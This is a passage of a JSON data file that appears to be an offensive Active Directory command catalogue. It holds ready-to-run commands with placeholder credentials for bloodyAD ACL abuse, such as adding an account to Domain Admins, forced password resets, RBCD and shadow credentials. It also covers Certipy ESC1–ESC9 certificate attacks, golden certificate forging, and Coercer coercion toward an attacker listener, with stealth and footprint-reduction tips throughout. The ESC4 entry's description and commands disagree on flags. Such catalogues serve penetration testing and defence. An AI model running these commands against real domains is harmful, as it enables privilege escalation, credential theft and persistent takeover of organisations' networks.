password123\n","mitre":[],"requires":["Password","Username"],"services":["Kerberos","NTLM"],"references":["https://github.com/ShutdownRepo/targetedKerberoast"]},{"id":"wadcoms:winPEAS","toolId":"wadcoms:winPEAS","toolName":"winPEAS","name":"winPEAS","source":"WADComs","platform":["Windows"],"capability":["Privilege Escalation"],"nativeCategory":["PrivEsc"],"command":"winpeas.exe cmd > output.txt","description":"winpeas.exe is a script that will search for all possible paths to escalate privileges on Windows hosts. The below command will run all priv esc checks and store the output in a file.\n\nCommand Reference:\n\n\tRun all checks: cmd\n\n\tOutput File: output.txt\n","mitre":[],"requires":["Shell"],"references":["https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS","https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/README.md","https://book.hacktricks.xyz/windows/windows-local-privilege-escalation"]},{"id":"wadcoms:adidnsdump-Enum","toolId":"wadcoms:adidnsdump","toolName":"adidnsdump","name":"adidnsdump-Enum","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# List available DNS zones\nadidnsdump -u 'test.local\\john' -p password123 --print-zones ldap://10.10.10.1\n# Dump the default zone; -r resolves nodes hidden from the unauthenticated listing (records.csv)\nadidnsdump -u 'test.local\\john' -p password123 -r ldap://10.10.10.1","description":"adidnsdump (dirkjanm) abuses the fact that any authenticated domain user can read the AD-integrated DNS zones (stored in the DomainDnsZones/ForestDnsZones partitions), effectively performing a zone transfer without being a DNS admin. Records whose node name is hidden from the anonymous listing are still enumerable and can be resolved by adding -r, which issues a live DNS query for each hidden node. This maps internal hostnames to IPs for target selection; results are written to records.csv. Use --print-zones first to see which zones exist.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1","mitre":["T1590.002"],"requires":["Username","Password"],"services":["DNS","LDAP"],"references":["https://github.com/dirkjanm/adidnsdump","https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/","https://attack.mitre.org/techniques/T1590/002/"],"added":true},{"id":"wadcoms:bloodyAD-AddComputer","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddComputer","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Create a computer account (returns the new SAM account name and password)\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add computer EVILPC 'Password123!'","description":"bloodyAD's `add computer` action creates a new machine account in the domain over LDAP. Any authenticated user can create up to ms-DS-MachineAccountQuota (default 10) computer accounts, so this is a reliable way to obtain an attacker-controlled principal for RBCD, shadow-credential, or S4U abuse chains. The created computer account has a known password you control. Check the MachineAccountQuota before use; a value of 0 blocks this.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"added":true},{"id":"wadcoms:bloodyAD-AddGenericAll","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddGenericAll","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Persistence","Execution"],"nativeCategory":["PrivEsc","Persistence","Exploitation"],"command":"# Grant john GenericAll over the victim object\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add genericAll victim john","description":"bloodyAD's `add genericAll` action writes a new ACE granting a trustee full control (GenericAll) over a target object's DACL via LDAP. Use it to escalate a lesser right (WriteDacl / WriteOwner) into full control over a user, group, or computer, or to establish a durable ACL backdoor for persistence. Once you hold GenericAll you can reset passwords, set shadow credentials, or configure RBCD on the target.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget object: victim\n\n\tGranted principal: john","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:bloodyAD-AddGroupMember","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddGroupMember","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Add yourself (john) to a group you can write to\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add groupMember 'Domain Admins' john","description":"bloodyAD's `add groupMember` action writes the `member` attribute of a group over LDAP, adding an arbitrary principal (typically yourself) to it. Use it when BloodHound shows you hold GenericAll, GenericWrite, WriteOwner, or Self/AddMember over a privileged group such as an admin or Remote Management group. Adding your account to a high-value group is a direct privilege-escalation primitive; remove yourself afterward to reduce footprint.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget group: Domain Admins","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/addmember","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:bloodyAD-AddRBCD","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-AddRBCD","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Lateral Movement","Execution"],"nativeCategory":["PrivEsc","Lateral Movement","Exploitation"],"command":"# Allow EVILPC$ to act on behalf of others against DC01$\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add rbcd 'DC01$' 'EVILPC$'","description":"bloodyAD's `add rbcd` action writes the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute of a target computer over LDAP, configuring Resource-Based Constrained Delegation so that a controlled service account may impersonate any user to that machine. Combine with an attacker-controlled computer account (see bloodyAD add computer) and Impacket getST -impersonate to obtain a service ticket as a local admin. Requires GenericWrite / GenericAll / WriteProperty over the target computer object.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget computer: DC01$\n\n\tControlled service: EVILPC$","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"],"added":true},{"id":"wadcoms:bloodyAD-DontReqPreauth","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-DontReqPreauth","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Execution"],"nativeCategory":["Credential Access","Exploitation"],"command":"# Enable targeted AS-REP roasting on the victim\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add uac victim -f DONT_REQ_PREAUTH","description":"bloodyAD's `add uac` action with the `-f DONT_REQ_PREAUTH` flag sets the DONT_REQ_PREAUTH bit in a target user's userAccountControl over LDAP, disabling Kerberos pre-authentication. This is a targeted AS-REP roasting primitive: once the flag is set you can request an AS-REP for the account and crack it offline. Requires GenericWrite / write access to the target's userAccountControl; remove the flag afterward to clean up.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim user: victim","mitre":[],"requires":["Username","Password"],"services":["LDAP","Kerberos"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast"],"added":true},{"id":"wadcoms:bloodyAD-SetOwner","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-SetOwner","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution","Persistence"],"nativeCategory":["PrivEsc","Exploitation","Persistence"],"command":"# Take ownership of the victim object, then grant yourself full control\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' set owner victim john\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add genericAll victim john","description":"bloodyAD's `set owner` action rewrites the owner field in a target object's security descriptor over LDAP. The object owner has implicit WriteDacl, so seizing ownership of a user, group, or computer lets you subsequently grant yourself GenericAll (see bloodyAD add genericAll) and fully control it. Use it when BloodHound reports WriteOwner over a principal. Pair it with a follow-up DACL write to complete the takeover.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget object: victim\n\n\tNew owner: john","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:bloodyAD-SetPassword","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-SetPassword","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"# Force-reset the password of a user you have write rights over\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' set password victim 'NewPassword123!'","description":"bloodyAD's `set password` action performs a targeted password reset on a user or computer object over LDAP(S). It is the exploitation step when you hold GenericAll, User-Force-Change-Password, or WriteAll over a victim principal discovered in BloodHound. Resetting a service account or privileged user password grants immediate takeover, at the cost of locking out the legitimate user, so it is loud. Requires LDAPS (or LDAP with channel binding) on modern DCs for the password write.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim user: victim","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"added":true},{"id":"wadcoms:bloodyAD-ShadowCredentials","toolId":"wadcoms:bloodyAD","toolName":"bloodyAD","name":"bloodyAD-ShadowCredentials","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Persistence","Credential Access"],"nativeCategory":["PrivEsc","Persistence","Credential Access"],"command":"# Add a shadow credential (KeyCredentialLink) to the victim\nbloodyAD --host 10.10.10.1 -d test.local -u john -p 'password123' add shadowCredentials 'DC01$'","description":"bloodyAD's `add shadowCredentials` action appends an attacker-generated key credential to the target's `msDS-KeyCredentialLink` attribute (the Shadow Credentials / Key Trust technique). Requiring only GenericWrite over the victim and an ADCS-enabled PKINIT-capable environment, it lets you authenticate as the target via a certificate and recover its NT hash without changing the account's password, making it far stealthier than a password reset. bloodyAD prints the PFX and follow-up PKINIT command.\n\nCommand Reference:\n\n\tTarget DC IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim account: DC01$","mitre":[],"requires":["Username","Password"],"services":["LDAP","ADCS"],"references":["https://github.com/CravateRouge/bloodyAD","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"added":true},{"id":"wadcoms:Certify-ESC1","toolId":"wadcoms:Certify","toolName":"Certify","name":"Certify-ESC1","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"Certify.exe request /ca:dc.test.local\\test-CA /template:ESC1 /altname:administrator","description":"Certify is the Windows/.NET GhostPack tool for enumerating and abusing AD CS from an existing foothold. Its request verb enrolls in a vulnerable template and, for ESC1, uses /altname to set an arbitrary Subject Alternative Name (e.g. Administrator) on the issued certificate. The output PEM is converted to .pfx with openssl and then passed to Rubeus asktgt /certificate for PKINIT. Use this when you already have a Windows beacon and want to stay on-host rather than pivoting to a Linux attacker box with Certipy.\n\nCommand Reference:\n\n\tCA config: dc.test.local\\test-CA\n\n\tTemplate: ESC1\n\n\tImpersonated user: Administrator","mitre":[],"requires":["Shell"],"services":["ADCS"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-Account-Create","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Account-Create","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"certipy account create -u john@test.local -p password123 -dc-ip 10.10.10.1 -user 'WEBSRV01$' -pass 'ComputerPass123!' -dns websrv01.test.local","description":"Certipy account create adds a new computer (or user) object over LDAP when the operator has MachineAccountQuota available or delegated create rights. This is useful for staging RBCD, Shadow Credentials, or ESC-chain victim accounts that the operator fully controls. The subcommand also supports read/update/delete to modify existing objects' attributes (UPN, SPN, DNS hostname). Runs over LDAP, so add -k / -dc-host for Kerberos-only environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNew account: WEBSRV01$\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://www.thehacker.recipes/ad/movement/adcs"],"added":true},{"id":"wadcoms:Certipy-Auth-PKINIT","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Auth-PKINIT","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"certipy auth -pfx administrator.pfx -username administrator -domain test.local -dc-ip 10.10.10.1","description":"Certipy auth consumes a certificate/private key pair (.pfx) and performs Kerberos PKINIT pre-authentication to request a TGT for the identity in the certificate. It then uses the U2U/UnPAC-the-hash technique to recover the account's NT hash from the PAC, saving a .ccache and printing the hash. This is the final step of most ADCS escalation chains (ESC1/ESC3/ESC6/shadow creds): turn the issued certificate into a usable TGT and an NT hash for pass-the-hash.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tPFX file: administrator.pfx\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["PFX"],"services":["Kerberos","ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/kerberos/pkinit"],"added":true},{"id":"wadcoms:Certipy-ESC1","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC1","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"certipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'ESC1' -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500","description":"ESC1 abuses a certificate template that allows an enrollee to supply an arbitrary Subject Alternative Name (ENROLLEE_SUPPLIES_SUBJECT) and enables Client Authentication EKU, while granting enrollment rights to low-privileged users. Certipy req enrolls against the vulnerable template and sets -upn to Administrator, producing a .pfx that authenticates as the domain admin. Supply -sid with the target's objectSid so the request also survives the 2022 strong certificate mapping (KB5014754) enforcement. Follow up with certipy auth to obtain a TGT and NT hash.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":[],"requires":["Username","Password"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC3","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC3","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# 1) Obtain an enrollment agent certificate\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'EnrollmentAgent'\n\n# 2) Request a cert on behalf of the Administrator using the agent pfx\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'User' -pfx john.pfx -on-behalf-of 'TEST\\Administrator'","description":"ESC3 abuses a template that grants the Certificate Request Agent (Enrollment Agent) EKU. Certipy first enrolls in the enrollment-agent template to obtain an agent .pfx, then makes a second request against a normal client-auth template (e.g. User) with -on-behalf-of set to a privileged account and -pfx pointing at the agent certificate. The resulting certificate authenticates as the impersonated user. Requires enrollment rights on both the agent template and the target template.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local","mitre":[],"requires":["Username","Password"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC4","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC4","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Back up the template config, then overwrite it with a default vulnerable (ESC1-like) configuration\ncertipy template -u john@test.local -p password123 -dc-ip 10.10.10.1 -template 'ESC4' -save-old\n\n# Now abuse it exactly like ESC1 (see Certipy-ESC1), then restore the original config afterwards:\n# certipy template -u john@test.local -p password123 -dc-ip 10.10.10.1 -template 'ESC4' -configuration ESC4.json","description":"ESC4 is a certificate template ACL misconfiguration: the operator has Write/WriteDacl/WriteOwner over a template object. Certipy template with -write-default-configuration overwrites the template's settings with a known ESC1-vulnerable configuration (enrollee-supplied SAN, client-auth EKU, low-priv enrollment), turning any template into an ESC1 path. Use -save-old first to snapshot the original config, exploit ESC1, then restore with -write-configuration <file>.json to reduce footprint. OPSEC: the template change is domain-wide and logged in the config partition.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["ADCS","LDAP"],"references":["https://github.com/ly4k/Certipy","https://www.thehacker.recipes/ad/movement/adcs/access-controls","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC6","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC6","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"certipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'User' -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500","description":"ESC6 occurs when the Enterprise CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set, which lets any requester embed an arbitrary SAN into a certificate regardless of the template's subject settings. Certipy req can therefore enroll in a standard client-auth template (e.g. User) while supplying -upn Administrator to impersonate a privileged account. Include -sid to satisfy strong certificate mapping. Note that post-May-2022 patched DCs ignore the SAN unless the mapping is present, so ESC6 alone is often mitigated on updated environments.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":[],"requires":["Username","Password"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC7-ManageCA","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC7-ManageCA","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Grant our user the officer right on the CA\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -add-officer john\n\n# Enable the SubCA template so we can request against it\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -enable-template 'SubCA'\n\n# Request (goes pending), then issue and retrieve as an officer\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -template 'SubCA' -upn administrator@test.local\ncertipy ca -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -issue-request 785\ncertipy req -u john@test.local -p password123 -dc-ip 10.10.10.1 -target dc.test.local -ca 'test-CA' -retrieve 785","description":"ESC7 is when a principal holds the ManageCA (or ManageCertificates) right on the Enterprise CA. Certipy ca -add-officer promotes the controlled user to a certificate officer, which lets it approve pending requests. Combined with enabling the built-in SubCA template (-enable-template SubCA), the operator can request a cert that goes pending, then issue it (-issue-request) and retrieve it (-retrieve) as any UPN. This turns CA administrative rights into domain-admin certificate issuance.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCA host (FQDN): dc.test.local","mitre":[],"requires":["Username","Password"],"services":["ADCS","RPC"],"references":["https://github.com/ly4k/Certipy","https://www.thehacker.recipes/ad/movement/adcs/access-controls","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC8-Relay","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC8-Relay","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Credential Access","Execution"],"nativeCategory":["PrivEsc","Credential Access","Exploitation"],"command":"# Start the ADCS HTTP relay targeting the CA web enrollment endpoint\ncertipy relay -target 'http://10.10.10.1' -template 'DomainController'\n\n# In another shell, coerce the DC to authenticate to the listener (10.10.10.2), e.g.\n# coercer coerce -u john -p password123 -d test.local -t 10.10.10.1 -l 10.10.10.2","description":"ESC8 abuses the AD CS web enrollment interface (certsrv / certfnsh.asp), which accepts NTLM authentication and is not protected by channel binding or EPA by default. Certipy relay stands up an HTTP-to-ADCS relay server; once a privileged machine account (e.g. a domain controller) is coerced into authenticating (PetitPotam/Coercer), the relay requests a certificate from the DomainController template on its behalf. The resulting .pfx authenticates as the coerced machine. Certipy relay is the modern replacement for ntlmrelayx.py -t http://<ca>/certsrv/certfnsh.asp --adcs.\n\nCommand Reference:\n\n\tCA / web enrollment host IP: 10.10.10.1\n\n\tAttacker/Listener IP: 10.10.10.2","mitre":[],"requires":["No_Creds"],"services":["ADCS","NTLM"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ESC9-NoSecurityExtension","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ESC9-NoSecurityExtension","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Point the controlled victim's UPN at the target admin (no @domain, so it maps by name)\ncertipy account update -u john@test.local -p password123 -dc-ip 10.10.10.1 -user victim -upn administrator\n\n# Enroll/authenticate as victim (now mapping to administrator), then restore:\n# certipy account update -u john@test.local -p password123 -dc-ip 10.10.10.1 -user victim -upn victim@test.local","description":"ESC9/ESC10 abuse weak certificate mapping. When a template has CT_FLAG_NO_SECURITY_EXTENSION (ESC9) or the DC uses weak UPN/SPN mapping (ESC10), an attacker with write access over a victim account can change its userPrincipalName to a target admin's value, enroll a certificate as the victim, then authenticate as the admin because the cert has no SID binding. Certipy account update rewrites the victim's -upn over LDAP; revert it afterwards. This chains with certipy shadow (to enroll as the victim) and certipy auth.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tVictim account: victim\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","ADCS"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-Find-Vulnerable","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Find-Vulnerable","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"certipy find -u john@test.local -p password123 -dc-ip 10.10.10.1 -vulnerable -stdout","description":"Certipy's find command enumerates the AD Certificate Services environment over LDAP and RPC, collecting Enterprise CAs, published certificate templates, and their security descriptors. The -vulnerable flag filters the output to only templates and CA settings that match a known ESC misconfiguration (ESC1-ESC16), and -stdout prints a readable report to the console instead of writing BloodHound/JSON/text files. Run this first with any domain foothold to map which escalation path is available before requesting a certificate.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["ADCS","LDAP"],"references":["https://github.com/ly4k/Certipy","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation","https://www.thehacker.recipes/ad/movement/adcs/certificate-templates"],"added":true},{"id":"wadcoms:Certipy-Forge-GoldenCert","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-Forge-GoldenCert","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"certipy forge -ca-pfx test-CA.pfx -upn administrator@test.local -sid S-1-5-21-1339291983-1349129144-367733775-500 -out administrator_forged.pfx","description":"A 'golden certificate' is forged offline once the operator has extracted the Enterprise CA's own certificate and private key (via certipy ca -backup or ESC7, output as a .pfx). Certipy forge signs a brand-new certificate for any UPN with that CA key, so it is trusted by every DC in the forest. Because it never touches the CA and needs no enrollment, it is a durable persistence primitive that survives the target user's password resets. Include -sid to satisfy strong certificate mapping. Feed the forged .pfx to certipy auth.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tCA private key (PFX): test-CA.pfx\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775","mitre":[],"requires":["PFX"],"services":["ADCS"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"added":true},{"id":"wadcoms:Certipy-ShadowCredentials","toolId":"wadcoms:Certipy","toolName":"Certipy","name":"Certipy-ShadowCredentials","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Privilege Escalation"],"nativeCategory":["Credential Access","PrivEsc"],"command":"certipy shadow auto -u john@test.local -p password123 -dc-ip 10.10.10.1 -account victim","description":"Shadow Credentials abuse write access to a target's msDS-KeyCredentialLink attribute (Key Trust). Certipy shadow auto adds an attacker-controlled key credential to the target account over LDAP, uses it to obtain a certificate via PKINIT, recovers the account's NT hash, and then removes the key credential to clean up automatically. Requires GenericWrite/GenericAll (or equivalent) over the target and a KDC that supports PKINIT. Preferred over PyWhisker when you want the full add-authenticate-restore chain in one step.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tTarget account: victim\n\n\tDomain Controller IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","Kerberos","ADCS"],"references":["https://github.com/ly4k/Certipy","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"added":true},{"id":"wadcoms:Coercer-Coerce","toolId":"wadcoms:Coercer","toolName":"Coercer","name":"Coercer-Coerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Coercer coerce -u john -p password123 -d test.local -t 10.10.10.1 -l 10.10.10.2","description":"Coercer is a multi-protocol authentication coercion tool that automatically walks through every known RPC coercion method (MS-RPRN, MS-EFSR, MS-DFSNM, MS-FSRVP, MS-EVEN and more) against a target and triggers the machine account to authenticate back to an attacker-controlled listener. The 'coerce' mode fires all applicable methods, making it the fastest way to obtain a machine-account NTLM authentication to feed into ntlmrelayx or krbrelayx. Requires a valid domain account by default and works well when you do not yet know which specific coercion vector (PrinterBug, PetitPotam, DFSCoerce, ShadowCoerce) is exposed. OPSEC: it is noisy, hitting many named pipes in one run.\n\nCommand Reference:\n\n\tTarget IP: 